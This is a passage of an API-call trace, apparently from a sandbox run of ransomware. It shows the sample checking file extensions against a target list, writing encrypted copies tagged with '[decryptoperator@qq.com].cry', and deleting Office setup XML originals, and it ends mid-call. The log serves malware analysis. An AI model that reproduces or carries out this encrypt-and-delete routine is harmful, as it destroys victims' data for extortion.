SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.586] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0040.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.586] lstrlenW (lpString=".doc") returned 4 [0040.586] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.586] lstrlenW (lpString=".docx") returned 5 [0040.586] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.586] lstrlenW (lpString=".pdf") returned 4 [0040.586] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.586] lstrlenW (lpString=".xls") returned 4 [0040.586] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.586] lstrlenW (lpString=".xlsx") returned 5 [0040.586] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.586] lstrlenW (lpString=".ppt") returned 4 [0040.586] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.586] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.586] lstrlenW (lpString=".zip") returned 4 [0040.586] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.586] lstrlenW (lpString=".rar") returned 4 [0040.586] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.586] lstrlenW (lpString=".bz2") returned 4 [0040.587] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".7z") returned 3 [0040.587] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".dbf") returned 4 [0040.587] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".1cd") returned 4 [0040.587] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".jpg") returned 4 [0040.587] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".doc") returned 4 [0040.587] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".docx") returned 5 [0040.587] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.587] lstrlenW (lpString=".pdf") returned 4 [0040.587] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".xls") returned 4 [0040.587] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".xlsx") returned 5 [0040.587] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.587] lstrlenW (lpString=".ppt") returned 4 [0040.587] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".zip") returned 4 [0040.587] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.587] lstrlenW (lpString=".rar") returned 4 [0040.587] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".bz2") returned 4 [0040.587] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.587] lstrlenW (lpString=".7z") returned 3 [0040.587] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.587] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.587] lstrlenW (lpString=".dbf") returned 4 [0040.587] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.588] lstrlenW (lpString=".1cd") returned 4 [0040.588] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.588] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0040.588] lstrlenW (lpString=".jpg") returned 4 [0040.588] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.588] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.588] lstrlenW (lpString="ProjectMUI.XML") returned 14 [0040.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.588] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1452) returned 1 [0040.588] CloseHandle (hObject=0x180) returned 1 [0040.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20 [0040.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.588] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.588] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.589] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0040.590] GetLastError () returned 0x0 [0040.590] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5ac, lpOverlapped=0x0) returned 1 [0040.666] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0040.667] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.667] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.667] SetEndOfFile (hFile=0x18c) returned 1 [0040.667] CloseHandle (hObject=0x18c) returned 1 [0040.668] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.668] SetEndOfFile (hFile=0x180) returned 1 [0040.669] CloseHandle (hObject=0x180) returned 1 [0040.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.669] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0040.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.669] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.669] lstrlenW (lpString=".doc") returned 4 [0040.669] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.669] lstrlenW (lpString=".docx") returned 5 [0040.669] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.669] lstrlenW (lpString=".pdf") returned 4 [0040.669] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.669] lstrlenW (lpString=".xls") returned 4 [0040.669] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.669] lstrlenW (lpString=".xlsx") returned 5 [0040.669] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.669] lstrlenW (lpString=".ppt") returned 4 [0040.670] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".zip") returned 4 [0040.670] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.670] lstrlenW (lpString=".rar") returned 4 [0040.670] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString=".bz2") returned 4 [0040.670] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString=".7z") returned 3 [0040.670] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".dbf") returned 4 [0040.670] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".1cd") returned 4 [0040.670] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".jpg") returned 4 [0040.670] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".doc") returned 4 [0040.670] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString=".docx") returned 5 [0040.670] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.670] lstrlenW (lpString=".pdf") returned 4 [0040.670] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString=".xls") returned 4 [0040.670] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString=".xlsx") returned 5 [0040.670] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.670] lstrlenW (lpString=".ppt") returned 4 [0040.670] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.670] lstrlenW (lpString=".zip") returned 4 [0040.670] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.670] lstrlenW (lpString=".rar") returned 4 [0040.670] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.671] lstrlenW (lpString=".bz2") returned 4 [0040.671] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.671] lstrlenW (lpString=".7z") returned 3 [0040.671] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.671] lstrlenW (lpString=".dbf") returned 4 [0040.671] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.671] lstrlenW (lpString=".1cd") returned 4 [0040.671] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0040.671] lstrlenW (lpString=".jpg") returned 4 [0040.671] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.671] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.671] lstrlenW (lpString="Proof.XML") returned 9 [0040.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.671] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1347) returned 1 [0040.671] CloseHandle (hObject=0x180) returned 1 [0040.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 0x20 [0040.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.672] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.672] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0040.672] GetLastError () returned 0x0 [0040.672] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x543, lpOverlapped=0x0) returned 1 [0041.111] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x550, lpOverlapped=0x0) returned 1 [0041.112] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.112] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.112] SetEndOfFile (hFile=0x18c) returned 1 [0041.112] CloseHandle (hObject=0x18c) returned 1 [0041.119] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.119] SetEndOfFile (hFile=0x180) returned 1 [0041.120] CloseHandle (hObject=0x180) returned 1 [0041.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.120] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.en\\proof.xml")) returned 1 [0041.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.121] lstrlenW (lpString=".doc") returned 4 [0041.121] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString=".docx") returned 5 [0041.121] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0041.121] lstrlenW (lpString=".pdf") returned 4 [0041.121] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString=".xls") returned 4 [0041.121] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString=".xlsx") returned 5 [0041.121] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0041.121] lstrlenW (lpString=".ppt") returned 4 [0041.121] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.121] lstrlenW (lpString=".zip") returned 4 [0041.121] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.121] lstrlenW (lpString=".rar") returned 4 [0041.121] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString=".bz2") returned 4 [0041.121] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString=".7z") returned 3 [0041.121] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.121] lstrlenW (lpString=".dbf") returned 4 [0041.121] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.124] lstrlenW (lpString=".1cd") returned 4 [0041.124] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.124] lstrlenW (lpString=".jpg") returned 4 [0041.125] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.125] lstrlenW (lpString=".doc") returned 4 [0041.125] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.125] lstrlenW (lpString=".docx") returned 5 [0041.125] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0041.125] lstrlenW (lpString=".pdf") returned 4 [0041.125] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.125] lstrlenW (lpString=".xls") returned 4 [0041.125] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.125] lstrlenW (lpString=".xlsx") returned 5 [0041.125] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0041.125] lstrlenW (lpString=".ppt") returned 4 [0041.125] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.125] lstrlenW (lpString=".zip") returned 4 [0041.125] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.126] lstrlenW (lpString=".rar") returned 4 [0041.126] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.126] lstrlenW (lpString=".bz2") returned 4 [0041.126] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.126] lstrlenW (lpString=".7z") returned 3 [0041.126] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.126] lstrlenW (lpString=".dbf") returned 4 [0041.126] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.126] lstrlenW (lpString=".1cd") returned 4 [0041.126] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.en\\Proof.XML") returned 98 [0041.126] lstrlenW (lpString=".jpg") returned 4 [0041.126] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.126] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.126] lstrlenW (lpString="PublisherMUI.XML") returned 16 [0041.126] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.126] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1450) returned 1 [0041.126] CloseHandle (hObject=0x1bc) returned 1 [0041.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml")) returned 0x20 [0041.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.127] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.127] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\PublisherMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\publishermui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0041.239] GetLastError () returned 0x0 [0041.239] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5aa, lpOverlapped=0x0) returned 1 [0041.251] WriteFile (in: hFile=0x1cc, lpBuffer=0x3a60020*, 